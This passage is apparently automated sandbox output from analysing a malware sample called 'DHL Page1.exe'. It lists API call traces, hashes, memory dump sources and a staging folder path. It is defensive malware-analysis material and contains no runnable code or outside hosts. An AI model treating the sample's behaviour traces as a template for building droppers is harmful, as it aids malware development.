                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FileWrite
                                              • String ID:
                                              • API String ID: 3934441357-0
                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                              • Instruction ID: 46774958090823e663cecc1425485f4f8cffaa3e8fa84660ad0031be83659422
                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                              • Instruction Fuzzy Hash: 22E0EC3226425AABDF109F55DC00EEB7B6CEB093A4F044837F955E3150D631EA219BE4
                                              APIs
                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID:
                                              • API String ID: 544645111-0
                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                              • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                              • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                              APIs
                                              • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 0040237F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: PrivateProfileString
                                              • String ID:
                                              • API String ID: 1096422788-0
                                              • Opcode ID: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                              • Instruction ID: dd75bc0ae23c3a1c44a4da6173f6571f456224c800c03a06d022cc4bf2e9b606
                                              • Opcode Fuzzy Hash: a0c645cdae85ff89f3910aa28bd6119042b2c01797eb2224224bfadf122582d4
                                              • Instruction Fuzzy Hash: C2E04F30804259AAEB00BFE0DE09AED3B68AF00384F10443AF640AB0D1E7F8C5829749
                                              APIs
                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: AttributesFile
                                              • String ID:
                                              • API String ID: 3188754299-0
                                              • Opcode ID: ebc6f0108ff20c7391e8834be7fc24cdfbaf299f9058229d1ea4fb54f603d532
                                              • Instruction ID: 6d0c2819641a95d4824ed615a3e4b51c4d1dd376adb528a119f99556ba9dc2b5
                                              • Opcode Fuzzy Hash: ebc6f0108ff20c7391e8834be7fc24cdfbaf299f9058229d1ea4fb54f603d532
                                              • Instruction Fuzzy Hash: A9D012327041049BDB10DBA4AB4869E73A0EB40369B218577D602F21D0D6F9CA919B29
                                              APIs
                                              • SendMessageW.USER32(000103D6,00000000,00000000,00000000), ref: 00404356
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: e4efbfa6a270d18bca2febec8f1cc7f76d5f2411a90ca5703cf2d1d509f33866
                                              • Instruction ID: 443f8e187224da6cfa76d7980b8ed720e6d4cbbe41b10c3d2bc684570ca6bb16
                                              • Opcode Fuzzy Hash: e4efbfa6a270d18bca2febec8f1cc7f76d5f2411a90ca5703cf2d1d509f33866
                                              • Instruction Fuzzy Hash: E3C09B727407017BDA109F509D46F1777586754701F1954397750F60D0C6B4D410D61C
                                              APIs
                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403124,?), ref: 00403432
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: FilePointer
                                              • String ID:
                                              • API String ID: 973152223-0
                                              • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                              • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                              • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                              • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                              APIs
                                              • SendMessageW.USER32(00000028,?,?,00404159), ref: 0040433B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend
                                              • String ID:
                                              • API String ID: 3850602802-0
                                              • Opcode ID: 64a68407c836843c56221a615a792e6a52c16efb0fea1465c7842f5a417f251c
                                              • Instruction ID: 64a08a55ceea2d1558f6d4f7f42fa5e28cf6011975d693489571b8877d5ffd11
                                              • Opcode Fuzzy Hash: 64a68407c836843c56221a615a792e6a52c16efb0fea1465c7842f5a417f251c
                                              • Instruction Fuzzy Hash: 7EB0123A180A00BBDE114B00EE09F857E72F7AC702F018438B340240F0CAB200A0DB08
                                              APIs
                                              • KiUserCallbackDispatcher.NTDLL(?,004040F2), ref: 00404324
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CallbackDispatcherUser
                                              • String ID:
                                              • API String ID: 2492992576-0
                                              • Opcode ID: a4072936c0dbda19daad3b6f87af0b9df629bfb569434203df2f15330338b18f
                                              • Instruction ID: 673d5dedd718a1dacc8ea30d6c65fccf4d4c02135a1364ed0a3c52864c45ce1c
                                              • Opcode Fuzzy Hash: a4072936c0dbda19daad3b6f87af0b9df629bfb569434203df2f15330338b18f
                                              • Instruction Fuzzy Hash: 26A00176944501EBCE529B90EF49D0ABB62ABA4701B5185B9A285900348A328862EB69
                                              APIs
                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: Sleep
                                              • String ID:
                                              • API String ID: 3472027048-0
                                              • Opcode ID: eea317c68a79a24d97d9dad49be95b0dd66468f040e9051977c3d92c9375d134
                                              • Instruction ID: ecb70030333676b341232910d06f26a8d16b92bd81aad1b8438947e9240f7980
                                              • Opcode Fuzzy Hash: eea317c68a79a24d97d9dad49be95b0dd66468f040e9051977c3d92c9375d134
                                              • Instruction Fuzzy Hash: 5DD05E73A141048BD710DBB8BE8589E73A8E7403293218837D002E20D1E6B8C8424A28
                                              APIs
                                              • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123239636452.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                              • Associated: 00000000.00000002.123239605456.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239665702.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000000.00000002.123239691897.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_10000000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: AllocGlobal
                                              • String ID:
                                              • API String ID: 3761449716-0
                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                              APIs
                                              • GetDlgItem.USER32(?,000003F9), ref: 00404D27
                                              • GetDlgItem.USER32(?,00000408), ref: 00404D32
                                              • GlobalAlloc.KERNEL32(00000040,?), ref: 00404D7C
                                              • LoadBitmapW.USER32(0000006E), ref: 00404D8F
                                              • SetWindowLongW.USER32(?,000000FC,00405307), ref: 00404DA8
                                              • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404DBC
                                              • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404DCE
                                              • SendMessageW.USER32(?,00001109,00000002), ref: 00404DE4
                                              • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404DF0
                                              • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404E02
                                              • DeleteObject.GDI32(00000000), ref: 00404E05
                                              • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404E30
                                              • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404E3C
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404ED2
                                              • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404EFD
                                              • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404F11
                                              • GetWindowLongW.USER32(?,000000F0), ref: 00404F40
                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404F4E
                                              • ShowWindow.USER32(?,00000005), ref: 00404F5F
                                              • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040505C
                                              • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004050C1
                                              • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004050D6
                                              • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004050FA
                                              • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040511A
                                              • ImageList_Destroy.COMCTL32(?), ref: 0040512F
                                              • GlobalFree.KERNEL32(?), ref: 0040513F
                                              • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004051B8
                                              • SendMessageW.USER32(?,00001102,?,?), ref: 00405261
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405270
                                              • InvalidateRect.USER32(?,00000000,?), ref: 00405290
                                              • ShowWindow.USER32(?,00000000), ref: 004052DE
                                              • GetDlgItem.USER32(?,000003FE), ref: 004052E9
                                              • ShowWindow.USER32(00000000), ref: 004052F0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                              • String ID: $M$N
                                              • API String ID: 1638840714-813528018
                                              • Opcode ID: c677ae728f418b72101c7994113019e3d5850be06ddcd651e5a6c075c9853ee2
                                              • Instruction ID: 59d51457869188ad52b443670c357e645d14acd51ea8025bb7b4989ae9bead0d
                                              • Opcode Fuzzy Hash: c677ae728f418b72101c7994113019e3d5850be06ddcd651e5a6c075c9853ee2
                                              • Instruction Fuzzy Hash: 52026EB0900209EFEB109F94DD85AAE7BB5FB44314F14817AF611BA2E1CB789D42DF58
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 004047E2
                                              • SetWindowTextW.USER32(00000000,-00436000), ref: 0040480C
                                              • SHBrowseForFolderW.SHELL32(?), ref: 004048BD
                                              • CoTaskMemFree.OLE32(00000000), ref: 004048C8
                                              • lstrcmpiW.KERNEL32(Call,0042D288,00000000,?,-00436000), ref: 004048FA
                                              • lstrcatW.KERNEL32(-00436000,Call), ref: 00404906
                                              • SetDlgItemTextW.USER32(?,000003FB,-00436000), ref: 00404918
                                                • Part of subcall function 0040595D: GetDlgItemTextW.USER32(?,?,00000400,0040494F), ref: 00405970
                                                • Part of subcall function 004064C8: CharNextW.USER32(?,*?|<>/":,00000000,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040652B
                                                • Part of subcall function 004064C8: CharNextW.USER32(?,?,?,00000000), ref: 0040653A
                                                • Part of subcall function 004064C8: CharNextW.USER32(?,00000000,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 0040653F
                                                • Part of subcall function 004064C8: CharPrevW.USER32(?,?,754F3420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\DHL Page1.exe",00403447,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403694), ref: 00406552
                                              • GetDiskFreeSpaceW.KERNEL32(0042B258,?,?,0000040F,?,0042B258,0042B258,-00436000,?,0042B258,-00436000,-00436000,000003FB,-00436000), ref: 004049DB
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049F6
                                                • Part of subcall function 00404B4F: lstrlenW.KERNEL32(0042D288,0042D288,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,-00436000), ref: 00404BF0
                                                • Part of subcall function 00404B4F: wsprintfW.USER32 ref: 00404BF9
                                                • Part of subcall function 00404B4F: SetDlgItemTextW.USER32(?,0042D288), ref: 00404C0C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: A$C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\zonitoides\sueve\ndsage$Call
                                              • API String ID: 2624150263-1009521253
                                              • Opcode ID: 1b2fc34563f76bf61f83b667b20011d998477ff675dccd00e8a19e5129c6032b
                                              • Instruction ID: 45aaea629e48a7dd69d477076305d6375789d7bfa395dacba7312c4f8929353f
                                              • Opcode Fuzzy Hash: 1b2fc34563f76bf61f83b667b20011d998477ff675dccd00e8a19e5129c6032b
                                              • Instruction Fuzzy Hash: 13A18EF1A00209ABDB11AFA5CD45AAFB7B8EF84714F10807BF611B62D1D77889418F6D
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.123225266470.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.123225224448.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225324993.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.000000000045C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000479000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225365662.0000000000482000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.0000000000488000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.123225725489.000000000049C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_DHL Page1.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 20c28db2716f7418e6426b6b0ec8d93621af288b2b8bbe9631545a7d6a933ec2
                                              • Instruction ID: 85afa31a812d1303c4ab180d4afb6369a73cfcef318546f17be8133eb081361b
                                              • Opcode Fuzzy Hash: 20c28db2716f7418e6426b6b0ec8d93621af288b2b8bbe9631545a7d6a933ec2
